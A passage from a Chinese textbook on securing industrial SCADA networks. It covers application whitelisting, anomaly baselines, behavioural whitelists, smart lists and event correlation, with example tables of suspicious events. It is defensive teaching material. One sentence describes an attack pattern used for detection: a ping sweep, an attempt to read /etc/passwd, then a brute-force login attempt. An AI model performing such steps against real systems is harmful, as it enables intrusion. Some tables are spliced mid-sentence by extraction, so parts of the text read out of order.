定义的规则的行为。如果系统能够主动阻止违规行为,它就具有主机入侵防御系 统 IPS(HIPS)的功能。 4)防病毒系统 防病毒系统被设计用来检查文件中存在的恶意病毒。防病毒系统的工作原理 与IDS(IDS 系统也能用来检测恶意软件)的工作原理类似,使用基于签名标记的 检测方法验证系统文件的安全性。当检测到签名标记和已知的病毒、木马或其他 恶意程序标记匹配时,可疑文件通常被隔离,以便它被清除或删除。 5)应用程序白名单 应用程序白名单机制(AWL) 为主机安全提供一种与传统的 HIDS、防病毒和 其他“黑名单”技术不同的防护方法。“黑名单”解决方案将被监视对象视为一个 已知的“问题对象”的名单列表,并同时产生两个问题: (1)黑名单必须随着新威胁的不断被发现而持续更新。 (2)在没有有效签名标记的情况下,并没有其他方法检测或阻止某些特定攻 击,例如Oday 漏洞攻击。 相反的情况是,“白名单”解决方案创建一张已经被认为是“正常对象”的名单 列表,其应用的逻辑非常简单,如果被监控对象不在列表中出现,则阻止它。 AWL解决方案对主机上的应用程序应用这个逻辑。通过这种方法, 一旦病毒 或木马程序渗透进入工业控制系统边界防御措施内部,并被发现已进入目标系统, 主机自身将阻止恶意软件执行,并使之不能起作用。 AWL非常适合工业控制系统网络,因为工业控制系统网络已经明确定义端口 和服务。此外,工业控制系统网络中的AWL不需要持续不断地下载、测试、评估 和安装签名标记的更新。更确切地说,AWL只需要当主机上的应用程序升级时, 同步进行升级和测试即可。 然而由于AWL运行在操作系统环境的底层,它将在主机上的所有应用程序 和服务的执行路径中增加新代码。该特点为主机的所有功能增加了潜在的危胁, 将对时间敏感型工业控制操作过程造成无法接受的时间延迟,并需要进行全套回 归测试。 6)外部控制 当不能简单使用基于主机的安全手段时,就需要使用外部工具如专门用于工 业控制系统的专用IDS、防火墙,和其他网络安全设备等监视和保护这些资产。很 多这类支持串口和以太网接口的设备,可以被直接部署在特定工业控制系统设备 或设备群组中,包括在特定过程控制或循环过程中部署。 其他外部控制机制,例如安全信息和事件管理系统,可以利用从其他资产(例如 MTU 或 HMI)、从其他信息存储介质(例如数据历史),或者网络本身获取的信 息,从整体角度,更加全局性地监视工业控制系统。这些信息可以用来检测跨多种 系统的风险和威胁活动。 外部控制,特别是被动监视和日志记录,也可以看做是对那些已经被主机防火 墙、基于主机的IDS、杀毒软件、AWL等保护的资产,提供一种补充性的保护手段。 通过识别和隔离功能集合,可以定义可量化的安全域。这些安全域应该在安 全域边界或安全域内部,使用多种工具,包括基于网络和主机的防火墙,基于网络 和主机的入侵检测系统/入侵防御系统(IDS/IPS) 、应用程序监视、杀毒软件、AWL 等,被安全地保护起来。 除了这些多种类型的控制手段所带来的直接安全优点之外,每一种手段都提 供了有用的告警能力。从这些和其他设备中收集的信息可以用来识别和建立安全 基线行为,进而检测例外和异常。从这些安全域的安全措施中产生的日志和事件, 也可应用于整体活动和行为态势监视。 5.2 基于工业 SCADA 系统安全域的异常、 入侵行为和威胁检测方法 通过定义工业 SCADA系统信息安全域,清晰定义关于具体哪些行为是被允 许的和哪些行为是不被允许的等策略。此外,严格定义每一个安全域的运行过程, 并且确保每一步的结果都可以预期,可以支持两类重要的行为分析技术:异常告警 和入侵行为检测。[50. 异常告警是一种自动检测机制,当任何时候发生违反预定义的安全策略的行 为时,该机制可以立即向管理员告警。在基于工业 SCADA 系统安全域的背景下, 这种机制实际上是违反安全域规则行为的公告:某些用户、系统或服务,正通过一 种违反安全域内部预先定义的安全策略的方式,与工业 SCADA 系统安全域相关 联。如果安全域内的异常告警机制希望的是一种行为,但实际出现的却是另一种 网络行为,那么该行为将被认为是潜在的威胁,并需要立即采取相应的措施。 入侵行为检测机制一般针对那些基于策略检测的终端设备,主要通过一种 “无规则”匹配的方法来识别可能遭受到的攻击行为。简言之,当工业 SCADA 系 统运行过程中出现一些违反常规的行为时,入侵行为检测机制将立即进行告警响 应操作。在一个工业控制系统内部(特别是那些配置高强度防护能力、深度防御 技术及独立的信息安全域的系统),生产过程中常规的操作和状态可以预先确定 并且改变的可能性非常小。工业 SCADA 系统网络的运转行为特征在一定程度上 是可以预测的,如果严格而完整地定义工业 SCADA 系统的所有常规操作,入侵行 为的检测将变得非常准确和高效。 然而,工业 SCADA系统入侵行为检测的效率依据对工业控制系统固有的、常规的运行行为的认识而定。因此,掌握如何完整定义工业控制系统基本的规则行 为的方法,是设计一种具有实际使用价值的入侵检测机制的首要任务。5] 同样重要的是,定义清晰的策略和入侵检测机制可以提供额外的功能:行为白 名单,行为白名单将对实际的工业控制系统网络行为(策略)的正确/错误的理解 与对预期行为的理解结合在一起,以此来定义什么是“符合规则的正确行为”。这 种白名单机制如同那些早已成熟的基于网络因素(如 IP 地址、应用程序、用户等) 的白名单一样,可以被用来约束参数和定义信息安全域的防御策略,这类工业控制 系统的高级行为白名单还可以辅助阻止范围广泛的威胁,甚至是越过信息安全域 的行为。 尽管每种入侵行为检测方法都具有一定的有效性,但攻击行为通常并不可能 以一种明确的、直接的模式发生。因此,为探测出更加高级的攻击威胁,必须将所 有的入侵行为和系统异常情况,系统日志和由网关、路由器、安全应用程序及其他 设备产生的事件日志结合起来进行综合评估,事件关联机制从整个系统的角度考 察那些存在巨大风险的、即将发生严重攻击行为的威胁。但是,事件关联机制也依 赖于有效的数据,前提是需要上述提到的所有入侵检测技术产生综合关联安全信 息。同时,事件关联机制需要对网络和设备进行更合理的监视过程。 自动检测工业 SCADA 系统安全域的异常、入侵行为和高级威胁的工具,是有 助于预警那些必须进行处理的安全威胁事件的高效手段。但是,目前并不存在完 全可信的自动化工具。工业控制系统安全专家的经验和洞察力是安全监视和分析 过程中非常必要的因素。商用自动化工具通常在其说明书中注明其分析过程是 “黑盒分析”,即使配置得最合理的自动化工具依然会产生错误的告警信息,因此 还是需要人工智慧参与工业控制系统的异常、入侵行为和高级威胁的评估 过程。[52] 5.2.1 异常报告机制 在上述章节所讨论的“利用功能集合建立工业 SCADA 系统信息安全域”中, 防火墙、入侵检测系统/人侵防护系统(IDS/IPS) 设备、应用程序监视器和其他信 息安全防护设备已经针对工业 SCADA 系统配置了特殊的防护策略。这些特殊的 防护策略除了具有当出现违反防火墙或入侵防御系统基本规则的事件时会立即告 警的功能外,还可以用于评估一系列工业 SCADA 系统网络行为的安全性。异常 报告机制报告所有的网络异常行为,而不像那些特定的防护策略一样只保护信息 安全域的边界参数所约束的网络行为,且这些策略对“正常”和“违规”行为做出相 应的“白与黑”判断。异常报告机制通过采集很多“疑似良性”的安全事件,可以较 早地探测很多可疑的攻击行为。 这种层次的评估过程可以包括一个工业 SCADA 系统信息安全域的所有可测 量功能,包括网络流量类型、用户访问、操作与控制等。在最基本的功能层次,异常 报告机制可以用来提醒工业 SCADA 系统操作人员,在某个时刻发生了一些原本 不允许进行的系统行为或操作(基于安全域的边界规则策略)。表5.6中的第一 例子就属于这种情况,网络内部的通信会话不可能是从一个非法用户的IP 地址发 起的——这种情形是必须由防火墙的[Deny ALL]策略默认禁止出现的。 表5.6 可疑异常事件的例子 异常事件 需要强制执 行的策略 异常事 件发现者 推荐的处 理方式 网络访问流量源 自不同的信息安全 域而不是统一的目 标IP地址 功能集合/安全域 的网络隔离 防火墙、网络流量监视器、网 络入侵检测系统/入侵防御系统 等。使用$Enclave_IP变量 仅告警,并生成所有 通信报文的日志记录 报告 从外部互联网IP 地址发起的非法网 络流量看起来很像 信息安全域内部的 合法网络访问行为 关键信息安全域 与互联网的隔离 日志管理器/分析工具,SIEM 等与!$Enclave_IP变量和地 理分布数据相关联 严重告警安全域可 能遭受入侵渗透 合法用户使用一 个新的或不同的IP 地址访问网络 用户访问控制策略 日志管理器/分析工具,SIEM 等将!$Enclave_IP变量和用 户认证行为相关联 普通告警,生成异常 网络管理员行为 非授权用户执行 管理员权限的操作 用户访问控制 策略 日志管理器/分析工具,SIEM 等将!$Admin_users变量和应 用程序行为相关联 严重告警存在潜在 的、未授权的特权用户 范围扩大 工业SCADA系统 专用协议在非工业 SCADA系统网络安 全域中使用 使用专用协议对 网络进行功能集合 分离的策略 网络监视器、网络人侵检测系 统/人侵防护系统、应用程序监 视工具、工业控制系统协议监视 工具等,使用!$Enclave_Proto- col变量 普通告警,并生成协 议非正常使用的日志 报告 应用程序代码中 的“写”函数超出常 规商用软件的使用 习惯 管理员的控制 策略 应用程序分析工具扫描到代 码中含有类似“Modbus_Admin- istrator_Functions”的标识符或认 证系统发现非正常的管理员权 限变更事件 普通告警,生成非正常 管理者行为的审计 报告 工业控制系统协 议栈代码使用“写” 函数的原因是允许 非管理员用户对设 备进行认证 用户访问控制 策略 应用程序分析工具扫描到代 码中含有类似“Modbus_Admin- istrator_Functions”的认证日志, 表示一个非管理员用户设备或 其他日志分析工具将认证日志 与过程控制策略和工业控制系 统协议功能关联起来 严重告警,系统遭受 内 部 入 侵 者 威 胁 或 破坏 异常报告机制其他的、并不重要的应用如表5.6中最后一行所列,其中使用了 两种完全不同的探测方法(应用程序行为监测系统和日志分析工具)发现违反策 略或模棱两可的行为。当合法用户运行功能代码时,异常报告机制仅关注那些比 较重要的功能代码。 异常报告机制可以自动用于很多日志分析或信息安全管理系统,这种系统的 功能是使很多用户可以方便查看系统信息(一般指日志文件)内容,并将这些系统 信息关联起来。如果对系统中所配置的信息安全策略没有全面了解,将不能正确 识别异常行为。 5.2.2 异常行为探测机制 在有些情况下,异常会出现在工业控制系统网络的预期行为中,而不是表现出 明显地违反信息安全策略的异常操作。这种异常状态可以通过对比所监视到的异 常行为与常规的已知数值之间的差异发现,可以通过很多途径实现这种方法:操作 人员手动进行实时监视;操作人员人工观察日志;使用网络行为异常检测产品、日 志分析或安全信息和事件管理(SIEM) 工具自动检测;或通过将数据导入电子数据 表格或其他统计应用程序自动实现。无论通过人工或自动方式实现异常报告功 能,如果没有预先建立起可以用来对比网络行为的行为基线,就很难发现异常行 为。 一旦预先以一定的标准建立起异常行为比对的基线(例如网络流量的规模, 网络存活用户的数量等),该衡量标准必须使用多种辅助方法进行严格检测。 1)测量基线 基线是依据工业控制系统网络的平均运行水平以一定的时间间隔计算出来 的,基线提供了用来与预期数值(基线)进行对比的基础。基线对于比较以前的行 为和当前的行为非常有用,但也可以用来测量网络或应用程序的效能,或随时可以 进行追溯的几乎任何网络操作行为。基线分析不能与网络趋势分析混淆起来,基 线是一种数值关系,不能超出也不能减少。使用以前已观测到的网络行为和未来 可预测的网络行为中的数值是一种趋势分析过程,是一种使用网络系统应用已知 的基线特征预测那些可观测网络的连续性的方法。53 工业控制系统网络基线可以简单也可以很复杂,可以是对系统如何运行的理 解,也可以是对先进的、复杂的硬件资源的统计,和其他可统计的数据。最简单的 建立系统基线的办法是将一段时间内所采集的数据全部收集起来,并使用一切可 以使用的方法计算出一段时间内的平均值。当分析统计数据是否超出或低于特定 的数值水平时,分析人员经常使用这种方法,如图5.17所示。 可以很清楚地看到某种产品的产量既没有超出也没有低于前12个月的平均 生产水平,图5.17中曲线的波峰和波谷可以表示从安装过程到控制过程进度表里 的各种常规变量等参数值。这种机制对于操作管理来说不一定有意义,在信息安 全应用背景中,这种类型的基线数值价值不大。假如脱离其他具体应用背景知识, Baseline 图5.17 一年中所有安全事件的平均值 知道一个月30天内发生了59421102个安全事件即平均每天发生1980703个安 全事件,并不说明每天发生2000000个安全事件有没有特殊的意义,该年平均统计 数值是否包含周末和其他停工时间?如果包含,每个工作日的实际预期数值将更 高。对于行为分析而言,更具有应用价值的方法是相似计算,该方法将可以预先明 确的停工期排除在外,同时产生一个与生产操作周期更相关的平均基线。效果更好 的方法是采用时间相关性基线,在这种方法中, 一个可观测周期内的基线行为,是通 过将一系列相似时间周期的数据进行抽样计算得到的。也就是说,如果考察一周的 数据情况,时间相关基线的数据将反映由很多周组成的时间周期内可预期的行为模 式。图5.18时间相关性基线表示在周末出现波谷,周四出现波峰显示时间相关性基 图5.18 时间相关性基线表示在周末出现波谷,周四出现波峰 2)异常行为检测 工业控制系统中的异常行为指的是那些常规的系统/网络/运行参数约束范围 之外的行为或现象,许多防火墙和入侵检测系统/入侵防御系统直接支持异常行为 检测功能,额外提供信息安全域边界中的异常行为检测能力。从整体上看,所有行 为都可以用来评估系统性入侵行为所代表的高强度威胁。因此,由于严格定义预 期行为模式(基线事件),异常行为将很容易被发现。此外,很多自动控制系统(包 括网络异常行为跟踪检测系统,日志管理器和安全信息和事件管理系统)具有跨 越很多不同的网络通信数据源,并灵活地检测异常行为的能力。[54] 由于不存在是否可以完全依靠的检测标记问题,异常行为检测技术将非常有 效,很多未知的威胁或攻击行为将可以被识别出来。此外,尽管行为基线通常专门 用于分析网络异常行为,但一段时间内采集的行为样本也可以用于统计分析和异 常行为探测。 例如,非预期情况下出现的网络延迟(这种参数很容易通过网络测量参数例 如 TCP错误、TCP接收窗口尺寸、ping包的生存时间[TTL] 等获取)可以用来表征 工业控制系统网络中的风险情况。然而,如表5.8所列,异常行为表示网络中的潜 在威胁的同时,同样可以表示正常的、合法的网络行为。 表5.8 可疑异常行为的例子 常规行为 异常行为 发现途径 异常情况说明 所有与现场PLC 组通信的Modbus网 络连接都只能来源 于同样三个具有人 机界面的工作站 网络中出现了第 四个人机交互系统 与PLC的连接 可以通过下列途径分 析检测出网络中的同一 个源IP地址的数量突然 增加了20%以上: (1)网络流量; (2)防火墙、入侵防御系 统设备等的安全事 件日志 ; (3)应用程序日志等 (1)一种新的、未授权的设备 接入到网络中(例如具有 管理员权限的便携式电 脑); (2)恶意的具有人机交互接 口(HMI)的用户正使用 虚假地址在网络中运行; (3)网络中安装了一个新系 统并上线运行 网络中的每台设 备只有一个独立 MAC地址和一个独 立的IP地址 可以观测到一个 IP地址起源于两个 或多个不同的MAC 地址 可以通过下列途径分 析观测每个IP地址源于 不止一个MAC地址: (1)网络流量; (2)防火墙、入侵防御系 统等设备的安全事 件日志 ; (3)应用程序日志等 (1)攻击者非法获取一个IP 地址,并进行欺骗; (2)一个设备出现故障并被 新的设备替换线是如何通过一条周末下跌和周四出现预期波峰的曲线影响平均值的。 时间相关性基线非常有用,因为该方法可以提供一种针对相关时间周期内的、 可观测行为的统计分析能力,特别可以提供以历史时间为背景的基线平均值的分 析。缺少时间相关性基线,周四出现的网络行为数据曲线的波峰也许会被错误地 认为是异常事件,并触发不必要的深度信息安全分析,而事实上该曲线的波峰表示 的是很正常的网络行为。工业 SCADA 系统公司可能会在每个月的月初、 一天中 的特殊时段或者季节性的以及所有可预见的事故应急处理过程中规定计划内操作 或处理流程,而这些定期操作或处理规定都可能导致事件集合中的异常发生。 基线可以通过很多方式形成,但所有方法都从收集一段时间内的相关数据开 始,接下来是对这些数据的统计分析。尽管无论以什么标准作为统计分析的依据, 这些分析工作都可以人工手动进行,但通常情况下该功能一般由支持收集海量的 量纲数据的同类产品/系统完成,例如历史数据库或安全信息和事件管理系统等 (表5.7)。 表5.7 基线量纲的度量和分析 行为 测量标准 测量工具 分析工具 网络流量 (1)源IP地址总数: (2)目的IP地址总数; (3)TCP/UDP端口总数; (4)网络容量(流量总数); (5)网络容量(字节总数); (6)流量持续时间 (1)网络交换机/路由器流量 日 志 ; (2)网络探针(如入侵检测系 统/入侵防御系统,网络 监视器等) (1)网络行为不规则事件 探测系统(NBAD); (2)日志管理系统; (3)安全信息和事件管理 系统 用户行为 (1)存活用户总数; (2)上线用户总数; (3)下线用户总数; (4)用户执行的登录操作; (5)用户执行的下线操作; (6)用户行为(例如配置变 化)等 (1)应用程序日志; (2)数据库日志和/或交易 分 析 ; (3)应用程序日志和/或会话 分 析 ; (4)集中鉴别认证(轻量级目 录访问协议,活动目录 身份和鉴别管理) (1)日志管理系统; (2)安全信息和事件管理 系统 过程/控 制行为 (1)功能代码总数; (2)每段功能代码的字符 总 数 ; (3)断点或其他配置变化 总数 (1)工业控制系统协议监 视 器 ; (2)应用程序监视器; (3)历史数据标签 (1)历史数据; (2)安全信息和事件管理 系统 事件/活 动的活跃 状态 (1)事件总数; (2)事件的危险程度/严重 程 度 ; (3)安全设备的事件总数 安全防护设备(例如防火墙、 入侵防御系统)日志 (1)应用程序监视器; (2)工业控制系统协议过 滤器 基于工业SCADA系统安全域的信息安全技术及 应用 ( 续 ) 常规行为 异常行为 发现途径 异常情况说明 控制系统信息安 全域内的运转过程 长期工作在连续周 期的控制环路闭环 状态 网络流量增加超 出预期的容限值; 网络流量减少超出 预期的容限值 网络流量分析发现以 字节数统计的整体网络 流 量 超 过 2 0 % 以 上 的 增长 网络流量分析发现以 字节数统计的整体网络 流量减少20%以上 (1)网络中运行未授权的 服 务 ; (2)正在进行网络扫描或运 行测试探针程序; (3)网络行为正在发生变化; (4)启动了一个新的批量作 业过程或流程; (5)网络中的服务停止; (6)连网设备发生故障或 下 线 ; (7)完成一个批量作业过程 或流程 可编程控制器 (PLC)的变化 工业网络监视器 监测到诸如SCADA 入侵检测系统的梯 形逻辑/代码检查 独立功能函数代码和/ 或任何功能函数代码出 现频率的任何变化 可通过下列方式发现: (1)工业控制系统协议 监 视 ; (2)应用程序监视; (3)SCADA入侵检测系 统/人侵防御系统 日 志 ; (1)一个控制过程被替换; (2)启动一个新的控制过程; (3)旧的控制过程被移除; (4)一个控制过程遭到恶意 破坏 未授权用户只能 在系统开始运行的 最初阶段登录系统 (1)未授权用户登 录系统通常只 能由管理员进 行控制 ; (2)合法用户在非 正常时间登录 系 统 ; (3)合法用户登录 未知的、非权限 范围内的系统 分析未授权日志的任 何变化的途径如下: (1)投运系统日志的活 动目录 ; (2)应用程序日志 (1)系统中发生了人为的更 改行为 ; (2)管理员离岗或离职,其管 理员职责已转交给其他 用 户 ; (3)恶意用户通过系统的认 证过程 ; (4)管理员账号被窃取并被 攻击者非法使用 换句话说,使用异常行为检测技术可能导致误报率升高。155 3)IT 分析与操作系统度量对比 目前对于异常行为检测的讨论主要集中于利用传统 IT 信息安全工具检测到 的安全事件,甚至讨论那些针对工业控制系统网络监视开发的、特殊的安全产品 时,这些安全产品也使用和传统 IT 信息安全设备相同的模式探测和阻止可疑的、 和/或“违反策略”的事件,进而产生告警。 4)异常行为检测工具 工业 SCADA控制网络的异常行为检测可以通过”直觉”方式、借助电子数据 表格或数学应用公式手工统计计算,或者使用类似特定的日志管理系统以及安全 信息和事件管理系统的方式完成。时间相关型数据库,例如用于历史数据分析的 数据库等也可以用于异常行为分析检测。虽然这些系统通常并不能完全代表具体 的网络安全意义下的异常行为,但详细察看安全事件按时间顺序排列的历史情况, 可以很容易地发现那些可能代表网络攻击行动的、危险的异常行为。 网络行为异常检测系统、日志管理系统、安全信息和事件管理工具主要用于与 信息安全相关的异常行为检测。网络行为异常检测系统是专门为观测IP 数据网 络活动研发的,可能支持、也可能完全不支持在监视控制和数据采集系统或分布式 控制系统网络环境中使用的、专用的工业控制系统网络协议。就这一点而言,日志 管理系统或安全信息和事件管理系统可能更适合工业控制系统网络中的异常行为 检测。当选择一款工业控制网络异常检测的分析工具时,应该考虑最相关的时间 分析框架并确保系统能够在足够的时间周期内自动完成异常检测。许多系统,如 日志管理信息系统、安全信息和事件管理系统,并非专门为异常检测设计的,因而 在信息评估能力和/或评估时间长短方面可能存在局限性。为了确保选择正确的 工具用于正确的工作,需要考察具体控制过程的运行生命周期,并使用时间相关的 基线判定这些过程的正常行为特征。如果一个工业控制过程需要持续3小时,那 么分析以n×3 小时为时间间隔的控制过程数据是完成异常检测所需的方法,这时 n 表示采样操作的数量。 n 的数值越大,基线的精度越高,异常行为检测的准确性 就越高。[56] 5.2.3 行为白名单 白名单机制在访问控制技术以及用于主机防病毒的应用程序白名单技术背景 下很容易理解。但是,工业控制系统环境中的白名单概念却需要发挥很多作用,例 如需要全面定义工业控制系统网络中的访问、通信、过程、策略和操作。利用工业 控制系统的受控特性以及本书中定义的安全域策略,白名单可以用于定义很多类 型的网络和安全度量标准,包括用户、资产、应用程序等。 工业控制系统中的白名单机制可以通过灵活地修改防火墙或入侵防御系统中 原有的白名单策略(Deny!Whitelist) 实现,或者可以通过动态安全控制技术将网 络监视技术和异常行为报告能力结合起来,从而在整个网络中使用白名单。例如, 如果出现异常行为超出安全域策略规定范围之外的情形,可以运行一个脚本提高 特定安全域的参数保护级别。57 1)用户白名单 了解工业控制系统用户行为(特别是管理员用户)对检测由内部人员(如对公 司不满的员工)和外部入侵者发起的网络攻击行为十分有用,将重要的功能锁定为只能由管理员使用,并配置完善的用户鉴别和访问控制策略,意味着攻击者入侵 关键系统必须不得不从获取管理员账号开始。在实际情况下,穷举是网络攻击行 动的标准过程,因为管理员账号可用于恶意攻击,并且管理员账号一旦被劫持可以 用于升级其他恶意账户,以便使未授权用户获取管理员权限。 另一方面,授权用户已经被正确识别并登记在案,因而可以依据此记录建立用 户的白名单行为。如同其他任何白名单一样,需要先建立合法用户列表以及相应 的、可监视的行为特征。在这种情况下,授权用户可以使用目录服务或身份认证管 理(IAM) 系统,例如轻量级目录访问协议(LDAP), 微软的活动目录,或IBM、Ora- cle、Sun 和其他公司的商用身份认证管理系统等进行识别。 如同异常告警机制一样,必须首先定义白名单,然后将所监视到的网络行为与 白名单进行对比。如果有异常发生,很明显在预先设定的安全策略之外发生了不 符合规则的事件。对用户白名单而言,所有合法用户账号被用做所有登录行为的 检测过滤器。如果用户在白名单列表里, 一切正常;如果用户不在白名单列表中, 意味着发生违规事件,告警信息将发送至安全管理员,该过程同时实现将所有流氓 账户、默认账户,或其他违反认证策略的行为标上标签。在“震网”病毒的例子中, “震网”病毒代码使用默认的(隐藏很深的)认证证书访问可编程逻辑控制器 (PLC)。 假设运营商没有意识到这个账户,并没有明确将该账号定义为一个已知 的合法用户或白名单账号,于是这种情形将引起异常告警,提醒网络安全管理人员 当前存在异常情况。对于隐藏账号和“硬件认证后门”的情形,如“震网”病毒例子 中,常规通信连接过程也被标记为异常,因为这些账号一般不出现在白名单中,于 是将产生潜在的、很多的告警事件。这些告警事件将引起整个系统中已经存在的 账号身份认证系统的注意,并提醒该系统更严密地监视其账号的变化情况。例如, WinCC 的鉴别认证系统可以利用基线分析机制进行监视,如果默认账号不小心被 恶意用户利用,仍然可能通过入侵行为监视发现攻击威胁。 2)资产白名单 一旦建立起网络资产目录(无论是通过适当的软件进行网络扫描自动完成还 是手动配置完成目录),由此产生的已知、授权设备列表可以作为已知的、合法网 络设备白名单使用。 此外,与基于边界条件的安全策略仅允许已知的合法设备访问安全域不同,网 络资产白名单可以应用于安全域内的设备。如果在安全域内部出现欺骗地址或恶 意攻击设备,仍然可以通过异常告警机制对已知、合法设备列表进行检测,进而可 以采取相应的行动。 应用资产白名单的典型环境是移动通信网络,移动通信终端可以被直接带到 防御系统的安全防护边界内部,甚至可以直接访问受保护网络,从而直接位于安全 域的内部。这样的场景非常普遍, 一个员工带着iphone 使 用WiFi连接到一个控制 系统,或者是一个特工使用精心设计的无线通信装置。不管使用哪种方法,这个设备的 IP 地址会被交换机、路由器、网络监控设备和边界安全设备探测到,最终会在 集中管理的日志和事件库中出现,如图5.19所示。在这种情况下,使用白名单进 行简单地对比就可以阻止这些未经授权认证的设备。这个例子展示了明显的风 险,正如手机直接连入3G、4G 网络,使得原先由封装安全载荷提供的防护措施失 效,将网络置于可能被攻击和探测下。 图5.19 与非法设备IP 地址相关的信息流向 白名单本身需要在中央管理系统中产生和申请应用,正如一个日志管理或者 一个 SIEM 系统一样有能力监视整个网络的设备行为。依据专业的、已投入使用 的特殊监视产品的情况,白名单将通过定义系统变量(例如防火墙或者 IDS/IPS 产 品中产生安全域相关的变量)、配置数据字典、手动生成探测标签记号等方式进行 使用。 3)应用程序行为白名单 使用AWL产品可以为每台主机上的应用程序设置白名单。然而网络中应用 程序的行为也可以使用白名单。和使用资产白名单一样,应用程序行为白名单需 要定义合法行为和违规行为的区别。如同资产白名单一样,中央监视和管理系统 可以通过定义日志管理器或安全信息和事件管理系统内的一系列端口的方法实现 应用程序行为白名单。但根据工业控制系统网络协议的特性,很多应用程序的行 为可以直接通过监视这些协议和解码分析具体的执行函数和指令的方式进行检 测,使得在工业控制系统中除日志管理系统或安全信息和事件管理系统提供的网络白名单之外,还有工业应用程序行为的在线白名单。如果已经使用了在线白名 单,通过工业控制系统安全设备或者应用监控设备,网络白名单有助于评估工业控 制系统常规动作范围外的应用程序行为。 工业控制系统网络中的应用程序行为白名单例子如下: ① 只允许只读函数代码执行; ② 主协议数据单元(PDU) 或者数据包只允许在预先定义的资产中出现; ③ 只允许特殊定义的功能代码。 一些企业网络中的应用程序行为白名单的例子如下: ① 只有经过编码的 HTTP 网页传输被允许并只能使用443端口; ② WEB 提交数据请求时只能使用 POST 命令; ③ 拥有人机界面(HMI) 的应用程序只允许在预先定义的主机上使用。 与使用环境相关的应用程序行为白名单的例子如下: ① 写命令只允许在本地现场总线协议应用中使用,而不允许在TCP/IP 协议 应用中使用; ② HMI 程序在管理员网络只允许在TCP/IP 的网络协议中使用读命令。 换句话说,与AWL系统只允许执行某种认证程序不同,应用程序行为白名单 只允许应用程序在网络中以特殊设定的模式实现其功能。 举个例子,用户在一个基于 window 操作系统的 HMI设备上安装一个 AWL 系 统。该 AWL允许执行 HMI 程序,允许运行最小数量的、必要的操作系统服务,并 允许建立 MODBUS协议 Socket 连接过程所需的网络服务,于是 HMI 程序可以和 一系列 RTU、PLC 等设备通信。但是,AWL不会控制 HMI 程序是怎样被使用的 RTU 和 PLC会执行哪些指令和控制操作。尽管 HMI受到AWL的保护,但一个心 怀不满的员工还是可以使用HMI 系统关闭关键系统、随意更改配置或中断系统的 正常运转。网络应用程序行为白名单观察 HMI怎样工作,并且与预先定义的、包 含授权命令的白名单相比较(该例子中是一些较为明确的 MODBUS 函数代码)。 一些没有经过明确定义的功能函数将被主动阻止,或者被允许通过,但是系统会产 生告警信息通知管理员发生了违反策略的行为。 工业控制系统协议或应用程序监控工具应该能基本识别工业控制系统协议和 功能,使得行为白名单可以直接在设备内部产生。对于网络行为白名单,需要定义 变量或者数据字典,明确在应用程序行为白名单中作用明显的通用变量包括相同 应用程序的函数代码、工业控制系统协议使用的特殊命令,并合理地分类组织管理 (读、写、系统命令、同步等)。 4)白名单的例子 许多白名单都源于使用“利用功能集合建立工业 SCADA 系统安全域”中描述 的功能集合。表5.9定义许多通用的白名单,并说明白名单是如何被执行的。 表5.9 行为白名单实例 白名单 使用技术 强制使用 威胁提示 通过IP认证设备 (1)网络监测或探测(比 如一个网络IDS); (2)网络扫描 (1)防火墙; (2)网络监测 (3)网络IDS/IPS 恶意设备在使用 通过端口来认证 应用程序 (1)脆弱性评估结果; (2)端口扫描 (1)防火墙; (2)网络IDS/IPS (3)应用程序流监测 正在运行的病毒程序 通过内容来认证 程序 应用程序监测 策略规则范围外的恶 意程序在运行 认证行为代码/命令 (1)工控网络监测器如 SCADA IDS; (2)梯形逻辑推测/函数 审查 (1)应用程序监测; (2)工控协议监测 策略规则外的过程在 运行 授权用户 (1)目录服务 (2)IAM (1)访问控制; (2)应用程序日志分析; (3)应用程序监测 正在使用的恶意账号 5)智能列表 2010年,“智能列表”的概念首次在英国伦敦,由SANS 组织主办的欧洲 SCA- DA 和过程控制峰会上被提出。“智能列表”将行为白名单与一系列智能推演过程 联系在一起。黑名单只定义不被允许的违规行为,白名单定义被允许的合法行为。 “智能列表”使用白名单动态定义黑名单。 举例,如果一个核心设备使用AWL来阻止恶意代码执行,当一个未授权认证 的应用程序试图执行时,AWL软件将产生告警。此时至少可以判断这个应用程序 在一个正常使用的特殊设备上不是合法的应用。但是,这也可能是一个合法的应 用在其他位置被无意中使用,并试图访问设备中的资产。 一种快速的相关分析方 法可以判断这个应用是个在其他未知的设备上可接受的应用;但智能列表会产生 一个报警信息而已。假如这个应用经过审查是不可接受的应用,将把这个应用列 为恶意程序,无论何时检测到均将采取初始化脚本或其他措施来阻止它。 智能列表将我们所知道的白名单与黑名单的特质进行动态的调整来针对新的 威胁。就像图5.20所表达一样。第一次,违反既定的策略会产生一个报警;第二 次,报警的性质就会改变,会检测其他系统行为;最终会产生一个决定,判定这是个 恶意应用,脚本或者自动的服务执行去动态地更新防火墙,IDS/IPS 或者其他的防 护措施,使得他们可以防止这种行为。假如不是这样。这个行为会产生报警或者 被忽略。 智能列表是一个对防护措施很有益的新概念,它使得对待未知攻击可以自动 采取如同已知攻击那样的防护措施。智能列表与安全管理工具配合使用时很引人 图5 .20 智能列表 注目,因为它涉及复杂的事件相关性分析过程。尽管它需要广泛的安全分析技术 与信息管理技术,但现在这个技术已经可以使用一些日志管理和安全信息和事件 管理系统(SIEM) 工具来实现。 5.2.4 威胁探测 直到目前为止,本书所讨论的独立使用的、特殊的探测机制包括:安全设备、程 序日志、网络连接、由异常告警或者入侵行为监测机制产生的特殊告警以及白名单 机制,这些机制提供:具体哪种策略被违反等有价值的数据信息。但是即便是简单 的攻击也由很多步骤组成,为探测一个安全事故,需要观测多个事件并在其中寻找 规律。例如,许多攻击行动都是从扫描行为开始,紧接着是穷举(踩点)技术,然后 是尝试登录所能穷举出的账户。这种过程等同于防火墙告警发生一个 ping 扫描, 接着尝试访问/etc/passwd 目录,紧接着对账户进行暴力破解的过程,对这种类型的威胁的探测模式被称为事件关联。正如赛博攻击的复杂性在持续的发展,事件 关联机制需要不断更新,不仅需要考察更多来源于网络中的安全设备的安全事件 数据,还需要额外的事件信息,诸如用户权限,或资产脆弱性,并需要寻找更复杂的 攻击模式。 “震网”病毒的出现引入了另外一种模式,使得事件相关过程更加复杂化。在 “震网”病毒之前,从没有攻击行为将IT(信息技术)技术与OT 技术(控制技术)混 合在一起,随着这两种系统中的攻击威胁样式不断地演化,将IT 与 OT 系统结合起 来是非常必要的。但是,目前设计成型的事件关联系统并不适合在控制系统中使 用,因此目前的挑战是在工业控制系统网络中探测更加高级的攻击威胁。 1)事件关联机制 事件关联机制通过将大量离散的时间数据关联起来,以简化威胁探测过程,将 